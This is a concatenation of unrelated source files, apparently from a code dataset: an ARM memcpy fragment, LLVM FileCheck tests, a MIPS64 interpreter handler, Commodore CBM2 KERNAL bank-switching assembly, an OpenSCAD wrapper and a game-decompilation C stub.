/* Get here if there are more than 4 bytes to copy.
Check if src is aligned. If beforehand src and dst were not word
aligned but congruent (same offset), then now they are both
word-aligned, and we can copy the rest efficiently (without
shifting). */
ands ip, r1, #3 /* ip = last 2 bits of src. */
beq word_aligned /* If r1 is word-aligned. */
src_not_word_aligned:
/* Get here when src is not word-aligned, but dst is word-aligned.
The number of bytes that remains to copy is r2+4. */
/* Copy word by word using LDR; hardware handles the misaligned
accesses, i.e., SCTLR.A is clear, so unaligned LDR and STR are
supported. */
subs r2, r2, #60
blt 8f
7:
/* Copy 64 bytes in every loop iteration. */
.irp offset, #0, #4, #8, #12, #16, #20, #24, #28, #32, #36, #40, #44, #48, #52, #56, #60
ldr r3, [r1, \offset]
str r3, [r0, \offset]
.endr
add r0, r0, #64
add r1, r1, #64
subs r2, r2, #64
bge 7b
8:
/* Get here if less than 64 bytes to copy, -64 <= r2 < 0.
Check if there is more than 3 bytes to copy. */
adds r2, r2, #60
blt copy_less_than_4
9:
/* Get here if there is less than 64 but at least 4 bytes to copy,
where the number of bytes to copy is r2+4. */
ldr r3, [r1], #4
str r3, [r0], #4
subs r2, r2, #4
bge 9b
b copy_less_than_4
.syntax unified
.global __aeabi_memcpy4
.type __aeabi_memcpy4, %function
/* Variant of __aeabi_memcpy for 4-byte-aligned src and dst:
   sets up the same stack frame, then joins the shared aligned path. */
__aeabi_memcpy4:
/* Assumes that both of its arguments are 4-byte aligned. */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
/* One-way branch into the shared body: lr is clobbered but was saved
   above, and the shared code returns via its pop {r0, pc}. */
bl word_aligned
.syntax unified
.global __aeabi_memcpy8
.type __aeabi_memcpy8, %function
/* Variant of __aeabi_memcpy for 8-byte-aligned src and dst: skips the
   alignment probing and enters the shared double-word loop directly. */
__aeabi_memcpy8:
/* Assumes that both of its arguments are 8-byte aligned. */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
/* Is there at least 8 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_8 /* If n < 8. */
/* Is there at least 64 bytes to copy? */
subs r2, r2, #56
blt copy_less_than_64 /* if n + 8 < 64. */
/* One-way branch into the shared body; return happens there. */
bl two_word_aligned
#endif
| {
"language": "Assembly"
} |
; RUN: opt < %s -instcombine -S | FileCheck %s
; FIXME: Some of these tests belong in InstSimplify.
; Regression tests for InstCombine folds of 'and' on non-power-of-8 and
; wide (>64-bit) integer types.
; Integer BitWidth <= 64 && BitWidth % 8 != 0.
; and X, 0 --> 0
define i39 @test0(i39 %A) {
; CHECK-LABEL: @test0(
; CHECK-NEXT: ret i39 0
;
%B = and i39 %A, 0 ; zero result
ret i39 %B
}
; and X, -1 --> X (all-ones mask is a no-op)
define i15 @test2(i15 %x) {
; CHECK-LABEL: @test2(
; CHECK-NEXT: ret i15 %x
;
%tmp.2 = and i15 %x, -1 ; noop
ret i15 %tmp.2
}
; Chained masks with disjoint bits (127 & 128 == 0) fold to 0.
define i23 @test3(i23 %x) {
; CHECK-LABEL: @test3(
; CHECK-NEXT: ret i23 0
;
%tmp.0 = and i23 %x, 127
%tmp.2 = and i23 %tmp.0, 128
ret i23 %tmp.2
}
; (X & high-bits-mask) != 0 --> unsigned compare against the mask's low edge.
define i1 @test4(i37 %x) {
; CHECK-LABEL: @test4(
; CHECK-NEXT: [[B:%.*]] = icmp ugt i37 %x, 2147483647
; CHECK-NEXT: ret i1 [[B]]
;
%A = and i37 %x, -2147483648
%B = icmp ne i37 %A, 0
ret i1 %B
}
; Known-bits through or/xor: (A|3)^12 has low 2 bits == 3, so the final
; 'and' folds to the constant 3; the store keeps the intermediates alive.
define i7 @test5(i7 %A, i7* %P) {
; CHECK-LABEL: @test5(
; CHECK-NEXT: [[B:%.*]] = or i7 %A, 3
; CHECK-NEXT: [[C:%.*]] = xor i7 [[B]], 12
; CHECK-NEXT: store i7 [[C]], i7* %P, align 1
; CHECK-NEXT: ret i7 3
;
%B = or i7 %A, 3
%C = xor i7 %B, 12
store i7 %C, i7* %P
%r = and i7 %C, 3
ret i7 %r
}
; ashr+mask of exactly the shifted-in range --> lshr (sign bits discarded).
define i47 @test7(i47 %A) {
; CHECK-LABEL: @test7(
; CHECK-NEXT: [[TMP1:%.*]] = lshr i47 %A, 39
; CHECK-NEXT: ret i47 [[TMP1]]
;
%X = ashr i47 %A, 39 ;; sign extend
%C1 = and i47 %X, 255
ret i47 %C1
}
; Integer BitWidth > 64 && BitWidth <= 1024.
; Wide-type duplicates of the tests above.
define i999 @test8(i999 %A) {
; CHECK-LABEL: @test8(
; CHECK-NEXT: ret i999 0
;
%B = and i999 %A, 0 ; zero result
ret i999 %B
}
define i1005 @test9(i1005 %x) {
; CHECK-LABEL: @test9(
; CHECK-NEXT: ret i1005 %x
;
%tmp.2 = and i1005 %x, -1 ; noop
ret i1005 %tmp.2
}
define i123 @test10(i123 %x) {
; CHECK-LABEL: @test10(
; CHECK-NEXT: ret i123 0
;
%tmp.0 = and i123 %x, 127
%tmp.2 = and i123 %tmp.0, 128
ret i123 %tmp.2
}
define i1 @test11(i737 %x) {
; CHECK-LABEL: @test11(
; CHECK-NEXT: [[B:%.*]] = icmp ugt i737 %x, 2147483647
; CHECK-NEXT: ret i1 [[B]]
;
%A = and i737 %x, -2147483648
%B = icmp ne i737 %A, 0
ret i1 %B
}
define i117 @test12(i117 %A, i117* %P) {
; CHECK-LABEL: @test12(
; CHECK-NEXT: [[B:%.*]] = or i117 %A, 3
; CHECK-NEXT: [[C:%.*]] = xor i117 [[B]], 12
; CHECK-NEXT: store i117 [[C]], i117* %P, align 4
; CHECK-NEXT: ret i117 3
;
%B = or i117 %A, 3
%C = xor i117 %B, 12
store i117 %C, i117* %P
%r = and i117 %C, 3
ret i117 %r
}
define i1024 @test13(i1024 %A) {
; CHECK-LABEL: @test13(
; CHECK-NEXT: [[TMP1:%.*]] = lshr i1024 %A, 1016
; CHECK-NEXT: ret i1024 [[TMP1]]
;
%X = ashr i1024 %A, 1016 ;; sign extend
%C1 = and i1024 %X, 255
ret i1024 %C1
}
| {
"language": "Assembly"
} |
// Check dumping of the resources stored in .res files.
// The input was generated with the following commands, using the original Windows
// rc.exe:
// > rc /fo test_resource.res /nologo test_resource.rc
// RUN: llvm-readobj %p/Inputs/resources/test_resource.res | FileCheck %s
// CHECK: Resource type (int): 9
// CHECK-NEXT: Resource name (string): MYACCELERATORS
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 24
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 11000300 E7030000 0D004400 4C040000 |..........D.L...|
// CHECK-NEXT: 0010: 82001200 BC010000 |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 2
// CHECK-NEXT: Resource name (string): CURSOR
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 808
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 28000000 10000000 10000000 01001800 |(...............|
// CHECK-NEXT: 0010: 00000000 00030000 C40E0000 C40E0000 |................|
// CHECK-NEXT: 0020: 00000000 00000000 FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0030: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0040: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0050: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0060: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0070: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0080: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0090: FFFFFFFF FFFFFFFF FFFFFFFF FF7F7F7F |................|
// CHECK-NEXT: 00A0: 7C7C7C78 78787575 75FFFFFF FFFFFFFF ||||xxxuuu.......|
// CHECK-NEXT: 00B0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 00C0: FFFFFFFF 979797FF FFFFFFFF FF838383 |................|
// CHECK-NEXT: 00D0: AAAAAADB DBDB7979 79757575 FFFFFFFF |......yyyuuu....|
// CHECK-NEXT: 00E0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 00F0: FFFFFFFF 9C9C9C98 9898FFFF FF888888 |................|
// CHECK-NEXT: 0100: DBDBDBB7 B7B77D7D 7DFFFFFF FFFFFFFF |......}}}.......|
// CHECK-NEXT: 0110: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0120: FFFFFFFF A0A0A09C 9C9C9393 93ADADAD |................|
// CHECK-NEXT: 0130: F2F2F284 84848181 81FFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0140: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0150: FFFFFFFF A4A4A4D7 D7D79D9D 9DD0D0D0 |................|
// CHECK-NEXT: 0160: EEEEEE91 91918D8D 8DFFFFFF FFFFFF81 |................|
// CHECK-NEXT: 0170: 81817E7E 7EFFFFFF FFFFFFFF FFFFFFFF |..~~~...........|
// CHECK-NEXT: 0180: FFFFFFFF A9A9A9F2 F2F2E5E5 E5E2E2E2 |................|
// CHECK-NEXT: 0190: 95959591 91918D8D 8D898989 868686FF |................|
// CHECK-NEXT: 01A0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 01B0: FFFFFFFF ADADADF2 F2F2E1E1 E1DFDFDF |................|
// CHECK-NEXT: 01C0: E7E7E7E4 E4E4BBBB BB8E8E8E FFFFFFFF |................|
// CHECK-NEXT: 01D0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 01E0: FFFFFFFF B5B5B5F2 F2F2E8E8 E8E7E7E7 |................|
// CHECK-NEXT: 01F0: EAEAEAC6 C6C69E9E 9EFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0200: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0210: FFFFFFFF B9B9B9F4 F4F4ECEC ECEDEDED |................|
// CHECK-NEXT: 0220: CBCBCBA7 A7A7FFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0230: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0240: FFFFFFFF BDBDBDF7 F7F7EFEF EFD0D0D0 |................|
// CHECK-NEXT: 0250: AFAFAFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0260: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0270: FFFFFFFF C1C1C1F7 F7F7D5D5 D5B6B6B6 |................|
// CHECK-NEXT: 0280: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0290: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02A0: FFFFFFFF C4C4C4D9 D9D9BEBE BEFFFFFF |................|
// CHECK-NEXT: 02B0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02C0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02D0: FFFFFFFF C8C8C8C5 C5C5FFFF FFFFFFFF |................|
// CHECK-NEXT: 02E0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 02F0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0300: FFFFFFFF CBCBCBFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0310: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0320: FFFFFFFF FFFFFFFF |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 2
// CHECK-NEXT: Resource name (string): OKAY
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 808
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 28000000 10000000 10000000 01001800 |(...............|
// CHECK-NEXT: 0010: 00000000 00030000 C40E0000 C40E0000 |................|
// (...)
// CHECK-DAG: 0310: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0320: FFFFFFFF FFFFFFFF |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 4
// CHECK-NEXT: Resource name (int): 14432
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 2052
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 46
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 00000000 00006400 79007500 00000000 |......d.y.u.....|
// CHECK-NEXT: 0010: 65007300 68006100 6C006100 00008000 |e.s.h.a.l.a.....|
// CHECK-NEXT: 0020: 66006B00 61006F00 79006100 0000 |f.k.a.o.y.a...|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 5
// CHECK-NEXT: Resource name (string): TESTDIALOG
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 108
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 0000C080 00000000 02000A00 0A00C800 |................|
// CHECK-NEXT: 0010: 2C010000 00005400 65007300 74000000 |,.....T.e.s.t...|
// CHECK-NEXT: 0020: 01000250 00000000 0A000A00 E6000E00 |...P............|
// CHECK-NEXT: 0030: 0100FFFF 82004300 6F006E00 74006900 |......C.o.n.t.i.|
// CHECK-NEXT: 0040: 6E007500 65003A00 00000000 00000150 |n.u.e.:........P|
// CHECK-NEXT: 0050: 00000000 42008600 A1000D00 0200FFFF |....B...........|
// CHECK-NEXT: 0060: 80002600 4F004B00 00000000 |..&.O.K.....|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 9
// CHECK-NEXT: Resource name (int): 12
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 24
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 11005800 A4000000 0D004800 2E160000 |..X.......H.....|
// CHECK-NEXT: 0010: 82001200 BC010000 |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 4
// CHECK-NEXT: Resource name (string): "EAT"
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x1030
// CHECK-NEXT: Language ID: 3081
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 48
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 00000000 00006400 66006900 73006800 |......d.f.i.s.h.|
// CHECK-NEXT: 0010: 00000000 65007300 61006C00 61006400 |....e.s.a.l.a.d.|
// CHECK-NEXT: 0020: 00008000 66006400 75006300 6B000000 |....f.d.u.c.k...|
// CHECK-NEXT: )
| {
"language": "Assembly"
} |
# Mterp interpreter handler fragment (MIPS64): calls the MterpIputObject
# C helper with (shadow frame, dex PC, current instruction, thread self).
# The surrounding macros (EXPORT_PC, FETCH_ADVANCE_INST, ...) are defined
# elsewhere in the interpreter sources.
.extern MterpIputObject
EXPORT_PC
daddu a0, rFP, OFF_FP_SHADOWFRAME # a0 = &shadow frame (frame ptr + fixed offset)
move a1, rPC
move a2, rINST
move a3, rSELF
jal MterpIputObject
# Helper returned zero -> raise the pending exception path.
# (beqzc is a compact branch: no delay slot.)
beqzc v0, MterpException
FETCH_ADVANCE_INST 2 # advance rPC, load rINST
GET_INST_OPCODE v0 # extract opcode from rINST
GOTO_OPCODE v0 # jump to next instruction
| {
"language": "Assembly"
} |
.PAG 'TXRAM'
; 02/28/83 BP
; TRANSFER EXEC ROUTINES FOR CBM2
; RAM ROUTINE TO SOFT LOAD
;
; These routines live in every bank and shuttle execution between the
; current bank and the system bank by rewriting the 6509's bank
; registers at $0000/$0001.
E6509 =$0000 ;6509 EXEC REGISTER
I6509 =$0001 ;6509 IND REGISTER
IPOINT = $00AC ;zero-page indirect pointer used for cross-bank stack access
STACKP = $01FF ;temp slot for a saved stack pointer
EXSUB =$FEAB
*=EXSUB-78
TXIRQ ;ENTRY FOR IRQ/BRK RAM SEGMENT
; Distinguish BRK from IRQ by inspecting the pushed .P (B flag),
; while preserving .A and I6509 across the dispatch.
STA IPOINT ;SAVE .A IN TMP
PLA ;REAL .P
PHA ;RESTORE .P FOR RTI
STA IPOINT+1 ;TMP .P
LDA I6509 ;SAVE I6509
PHA
LDA IPOINT+1 ;RESTORE .P IN .A
JSR TXIRQ2 ;SAVE THIS RTS ADDR
; TXIRQ2 JMPs into the handler; the handler's RTS returns here.
STA IPOINT ;SAVE .A IN TMP
PLA ;SO WE CAN RESTORE I6509
STA I6509
LDA IPOINT ;RESTORE .A FROM TMP
RTI ;NOW WE CAN RTI
;
TXNMI ;ENTRY FOR NMI RAM SEGMENT
; NMI can interrupt the transfer code itself, so every piece of
; transfer state (IPOINT, STACKP, I6509) is saved around the call.
PHA ;SAVE .A
LDA IPOINT ;SAVE IPOINT
PHA
LDA IPOINT+1
PHA
LDA STACKP ;SAVE STACKP
PHA
LDA I6509 ;SAVE I6509
PHA
JSR EXNMI ;CALL NMI AS SUB IN SEG F
PLA
STA I6509 ;RESTORE I6509
PLA
STA STACKP ;RESTORE STACKP
PLA
STA IPOINT+1 ;RESTORE IPOINT
PLA
STA IPOINT ;RESTORE .A
RTI
; Dispatch on the B flag (bit 4 of the pushed .P, passed in .A).
TXIRQ2 AND #$10 ;TEST FOR BRK OR IRQ
BNE EXBRKX ;IT'S A BRK
LDA IPOINT ;RESTORE .A
JMP EXIRQ ;GO IRQ
EXBRKX LDA IPOINT ;RESTORE .A
JMP EXBRK ;GO BRK
; EXSUBF: common stub that points the indirection register at the
; system bank ($0F) and falls into the cross-bank call thunk EXSUB.
EXSUBF PHP ;SAVE STATUS
PHA ;SAVE.A
LDA #$0F ;SYSTEM SEGMENT
STA I6509 ;SET UP IND POINTER
PLA ;RESTORE .A
PLP ;RESTORE STATUS
JMP EXSUB
*=EXSUB
; EXSUB: cross-bank call thunk. On entry I6509 selects the target
; bank and the caller reached here via JSR (from one of the jump-table
; stubs). It copies the saved registers and a synthesized return
; linkage onto the TARGET bank's stack (via (IPOINT),Y), then switches
; banks with GBYE. EXCRTS is the matching return path.
PHP ;SAVE STATUS
SEI
PHA ;.A
TXA
PHA ;.X
TYA
PHA ;.Y
JSR IPINIT ;INIT IPOINT AND LOAD STACK FROM XFER SEG
TAY ;.Y IS XFER SEG STACK POINTER
LDA E6509 ;PUSH RETURN SEGMENT TO USER STACK
JSR PUTAS ;PUSH .A TO OTHER STACK
LDA #<EXCRT2 ;XFER SEG RTS ROUTN
LDX #>EXCRT2 ;XFER SEG RTS ROUTN
JSR PUTAXS ;PUT .A.X TO XFER SEG STACK
TSX
; The JSR into the jump-table stub left the stub's address on our
; stack; subtract 3 (the JSR's length) to recover the routine slot.
LDA $0105,X ;.SP +5 IS ACTUAL ROUTN ADDR LO
SEC
SBC #03 ;-3 FOR JSR TO THIS ROUTN
PHA ;SAVE .A
LDA $0106,X ;HI ADDR
SBC #00
TAX ;.X HI
PLA ;RESTORE .A LO
JSR PUTAXS ;SAVE .A.X ONTO XFER SEG STACK
TYA ;XFER SEG STACK POINTER
; EXCOMM: shared tail — move the 4 saved registers (.Y.X.A.P) from
; this bank's stack to the transfer bank's stack, then push the
; register-restore routine's address and switch banks.
EXCOMM SEC
SBC #04 ;4 BYTES .Y.X.A.P
STA STACKP ;XFER SEG NEW STACK POINTER TEMP STORAGE
TAY ;USE THIS AS NEW POINTER ALSO
LDX #04 ;4 BYTES .Y.X.A.P
EXSU10 PLA
INY
STA (IPOINT),Y ;PUSH REGS FROM THIS STACK TO XFER SEG STACK
DEX
BNE EXSU10
LDY STACKP ;RESTORE .Y AS STACK POINTER FOR XFER SEG
LDA #<EXPUL2 ;PULL REGS AND RTS ROUTN
LDX #>EXPUL2 ;.HI PRENDN ROUTN IN XFER SEG
JSR PUTAXS ;PUT .A.X ON XFER SEG STACK
PLA ;FIX STACK
PLA ;FIX STACK
EXGBYE TSX
STX STACKP ;SAVE CURRENT STACK POINTER THIS SEG
TYA ;.Y IS STACK POINTER FOR XFER SEG
TAX
TXS ;NEW STACK FOR XFER SEG
LDA I6509 ;XFER SEG #
JMP GBYE ;GOOD BYE
;
NOP ;RETURNS HERE IF RTI
; EXCRTS: return path executed after the far routine finishes; it
; restores I6509 to the caller's bank and re-enters EXCOMM to copy
; the registers back.
EXCRTS PHP ;.P
PHP ;.P
; NOTE(review): .P is pushed twice here — the extra copy appears to
; balance the frame consumed on the way back (EXCOMM moves 4 bytes
; and EXPULL pops .P last); verify against the original KERNAL listing.
PHA ;.A
TXA
PHA ;.X
TYA
PHA ;.Y
TSX
LDA $0106,X ;.SP +6 IS RETURN SEG
STA I6509 ;RESTORE I6509 TO RETURN SEG
JSR IPINIT ;INIT IPOINT AND LOAD STACK FROM XFER SEG
JMP EXCOMM
;
; IPINIT: point IPOINT at $0100 (the stack page, reached through the
; indirection bank) and return the transfer bank's saved stack
; pointer (read from $01FF in that bank) in .A.
IPINIT LDY #01
STY IPOINT+1
DEY
STY IPOINT ;IPOINT=$0100
DEY ;.Y =$FF
LDA (IPOINT),Y ;LOAD STACK POINTER FROM $001FF
RTS
; PUTAXS / PUTAS: push .X:.A (hi:lo) or just .A onto the transfer
; bank's stack; .Y is the transfer-bank stack pointer and is
; decremented per byte, mirroring a real push.
PUTAXS PHA ;SAVE .A
TXA
STA (IPOINT),Y ;.X HI
DEY
PLA
PUTAS STA (IPOINT),Y ;.A LO
DEY
RTS
;
; EXPULL: restore .Y, .X, .A, .P from the stack, then RTS.
; (Entered via the EXPUL2 = EXPULL-1 return-address trick.)
EXPULL PLA
TAY ;.Y
PLA
TAX ;.X
PLA ;.A
PLP ;.P
RTS ;.P
;
; Far-call stubs for the three interrupt sources; each is a JSR into
; the system bank (segment F) via EXSUBF.
EXNMI JSR EXSUBF ;EX NMI IN SEG F
NOP ;MAKE ROOM
EXBRK JSR EXSUBF ;EX BRK IN SEG F
EXIRQ JSR EXSUBF ;EX IRQ IN SEG F
;
; Address-minus-one equates: these are pushed as synthetic return
; addresses, and RTS adds 1 to the address it pops.
EXCRT2=EXCRTS-1
EXPUL2=EXPULL-1
* =$FF6F
.PAG 'JUMP TABLE/VECTORS'
; KERNAL jump table: every entry is a 3-byte JSR EXSUBF stub, so the
; entry's own address identifies which system-bank routine to invoke
; (EXSUB recovers it from the return address, see SBC #03 above).
; Entry order/addresses are ABI — do not reorder.
VRESET JSR EXSUBF ;POWER-ON/OFF VECTOR RESET
IPCGO JSR EXSUBF ;LOOP FOR IPC SYSTEM
FUNKEY JSR EXSUBF ;FUNCTION KEY VECTOR
IPRQST JSR EXSUBF ;SEND IPC REQUEST
IOINIT JSR EXSUBF ;I/O INITIALIZATION
CINT JSR EXSUBF ;SCREEN INITIALIZATION
ALOCAT JSR EXSUBF ;ALLOCATION ROUTINE
VECTOR JSR EXSUBF ;READ/SET I/O VECTORS
RESTOR JSR EXSUBF ;RESTORE I/O VECTORS
LKUPSA JSR EXSUBF ;MATCH SA--RETURN SA,FA
LKUPLA JSR EXSUBF ;MATCH LA--RETURN SA,FA
SETMSG JSR EXSUBF ;CONTROL O.S. MESSAGES
SECND JSR EXSUBF ;SEND SA AFTER LISTEN
TKSA JSR EXSUBF ;SEND SA AFTER TALK
MEMTOP JSR EXSUBF ;SET/READ TOP OF MEMORY
MEMBOT JSR EXSUBF ;SET/READ BOTTOM OF MEMORY
SCNKEY JSR EXSUBF ;SCAN KEYBOARD
SETTMO JSR EXSUBF ;SET TIMEOUT IN IEEE
ACPTR JSR EXSUBF ;HANDSHAKE IEEE BYTE IN
CIOUT JSR EXSUBF ;HANDSHAKE IEEE BYTE OUT
UNTLK JSR EXSUBF ;SEND UNTALK OUT IEEE
UNLSN JSR EXSUBF ;SEND UNLISTEN OUT IEEE
LISTN JSR EXSUBF ;SEND LISTEN OUT IEEE
TALK JSR EXSUBF ;SEND TALK OUT IEEE
READST JSR EXSUBF ;READ/WRITE I/O STATUS BYTE
SETLFS JSR EXSUBF ;SET LA, FA, SA
SETNAM JSR EXSUBF ;SET LENGTH AND FN ADR
OPEN JSR EXSUBF ;OPEN LOGICAL FILE/TRANSMIT COMMAND
CLOSE JSR EXSUBF ;CLOSE LOGICAL FILE
CHKIN JSR EXSUBF ;OPEN CHANNEL IN
CKOUT JSR EXSUBF ;OPEN CHANNEL OUT
CLRCH JSR EXSUBF ;CLOSE I/O CHANNEL
BASIN JSR EXSUBF ;INPUT FROM CHANNEL
BSOUT JSR EXSUBF ;OUTPUT TO CHANNEL
LOAD JSR EXSUBF ;LOAD FROM FILE
SAVE JSR EXSUBF ;SAVE TO FILE
SETTIM JSR EXSUBF ;SET INTERNAL CLOCK
RDTIM JSR EXSUBF ;READ INTERNAL CLOCK
STOP JSR EXSUBF ;SCAN STOP KEY
GETIN JSR EXSUBF ;GET CHAR FROM Q
CLALL JSR EXSUBF ;CLOSE ALL FILES
UDTIM JSR EXSUBF ;INCREMENT CLOCK
SCRORG JSR EXSUBF ;SCREEN ORG
PLOT JSR EXSUBF ;READ/SET X,Y COORD
IOBASE JSR EXSUBF ;RETURN I/O BASE
.SKI 5
; GBYE: the actual bank switch — writing the execution-bank register
; takes effect so the following RTS pops from the NEW bank's stack.
GBYE STA E6509 ;GOODBYE...
RTS
*=$FFFA
; 6502-family hardware vectors: $FFFA/B = NMI, $FFFC/D = RESET,
; $FFFE/F = IRQ/BRK.
.WOR TXNMI ;TRANSFER NMI
; NOTE(review): the RESET vector slot ($FFFC) holds the initials 'BP';
; reset handling is presumably provided elsewhere — verify.
.BYT 'BP' ;BENNY PRUDEN
.WOR TXIRQ ;TRANSFER IRQ
.END
| {
"language": "Assembly"
} |
include <config.scad>
use <GDMUtils.scad>
use <joiners.scad>
use <rrd_graphic_lcd_case.scad>
// Printable-part wrapper: emits just the top/cover of the RRD graphic
// LCD case. The "// make me" marker on the module line is presumably
// consumed by the project's build tooling to enumerate printable parts
// — do not remove it.
module rrd_graphic_lcd_cover_parts() { // make me
rrd_graphic_lcd_case_top();
}
// Instantiate at top level so opening this file renders the part.
rrd_graphic_lcd_cover_parts();
// vim: noexpandtab tabstop=4 shiftwidth=4 softtabstop=4 nowrap
| {
"language": "Assembly"
} |
#include "z_en_sb.h"

/* Actor room/flag constants used by the (currently commented-out)
 * ActorInit table below. */
#define ROOM 0x00
#define FLAGS 0x00000005

/* Actor lifecycle callbacks; bodies are still non-matching assembly
 * (see the GLOBAL_ASM pragmas below). */
void EnSb_Init(EnSb* this, GlobalContext* globalCtx);
void EnSb_Destroy(EnSb* this, GlobalContext* globalCtx);
void EnSb_Update(EnSb* this, GlobalContext* globalCtx);
void EnSb_Draw(EnSb* this, GlobalContext* globalCtx);

/* Kept commented out until the overlay is matched; enabling it would
 * register the actor with these callbacks. */
/*
const ActorInit En_Sb_InitVars =
{
    ACTOR_EN_SB,
    ACTORTYPE_ENEMY,
    ROOM,
    FLAGS,
    OBJECT_SB,
    sizeof(EnSb),
    (ActorFunc)EnSb_Init,
    (ActorFunc)EnSb_Destroy,
    (ActorFunc)EnSb_Update,
    (ActorFunc)EnSb_Draw,
};
*/

/* Each pragma splices in the original assembly for a function that has
 * not yet been decompiled to matching C. */
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Init.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/EnSb_Destroy.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF790C.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF79BC.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7A34.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7AB0.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7B24.s")
#pragma GLOBAL_ASM("asm/non_matchings/overlays/actors/ovl_En_Sb/func_80AF7BCC.s")
